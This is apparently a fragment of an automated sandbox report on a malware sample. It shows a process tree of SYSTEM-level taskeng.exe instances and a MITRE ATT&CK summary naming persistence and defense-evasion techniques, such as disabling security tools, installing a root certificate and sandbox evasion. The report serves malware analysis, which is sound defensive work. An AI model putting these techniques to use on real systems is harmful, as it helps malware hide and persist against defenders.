C:\Windows\system32\taskeng.exetaskeng.exe {02DF3F53-CAFC-45F0-8218-4E6343A56661} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2268
-
C:\Windows\system32\taskeng.exetaskeng.exe {CAE692D3-73D9-4EB5-9D4A-4608DAA33493} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2452
-
C:\Windows\system32\taskeng.exetaskeng.exe {6D0DE187-210B-4855-8EFC-D2142A69DD88} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3632
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1